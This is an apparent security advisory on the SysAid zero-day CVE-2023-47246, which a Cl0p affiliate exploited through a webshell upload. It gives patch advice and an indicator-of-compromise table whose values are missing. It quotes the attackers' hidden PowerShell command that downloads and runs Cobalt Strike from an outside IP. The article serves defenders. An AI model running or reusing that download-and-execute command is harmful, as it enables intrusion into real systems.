SysAid zero-day flaw exploited by Cl0p hacker gang
Take action: If you are using SysAid IT support and management software download the patch and apply it ASAP. Such systems usually have an internet facing ticketing inteface which could be used as an attack vector. After patching, make a through review of the system for indicators of compromise. Be aggressive, don't wait for repeat of MOVEit.
A critical zero-day vulnerability within the SysAid IT support and management software has been identified as being exploited by Lace Tempest - an affiliate of the Cl0p ransomware group. The recent attacks, described as limited, were detected by Microsoft's Threat Intelligence team and communicated to SysAid on November 2, 2023.
The vulnerability is tracked as CVE-2023-47246 (No CVSS score yet) and is a path traversal vulnerability, which allows attackers unauthorized system access and arbitrary code execution. The attackers exploited this by uploading a WAR archive containing a webshell to the SysAid Tomcat web service, enabling further malicious activities including deploying a malware loader and a trojan into various system processes, and then executing a second PowerShell script to erase evidence of the intrusion. SysAid, upon being notified, launched an incident response protocol and reached out to their on-premise customers with a mitigation solution.
SysAid has released a patch (v23.3.36) to address the vulnerability and is urging customers to update their systems. They have provided indicators of compromise for users to check for any unauthorized access or suspicious activities and to review logs for any unusual behavior that could indicate exploitation:
|GraceWire Loader C2
|GraceWire Loader C2
|Cobalt Strike C2
|Meshagent remote admin tool C2
|Archive of WebShells and tools used by the attacker
|Used as a flag for the attacker scripts during execution
The following command is used to download and execute CobaltStrike after initial access is established:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')
After initial compromise, the attacker cleans up payloads used to establish an initial foothold on the infected servers, evidence of the following commands being run on SysAid servers indicates successful exploitation:
Microsoft Defender detects the components of this attack as the following threats:
|CasaOS Open Source cloud software critical vulnerabilities
|ESET patches vulnerability that causes web browsers to …
|Healthcare industry targeted by exploiting ManageEngine vulnerabilities
|Critical Splunk Enterprise Vulnerability reported, PoC already available
|A new stealth backdoor into vulnerable Confluence persists …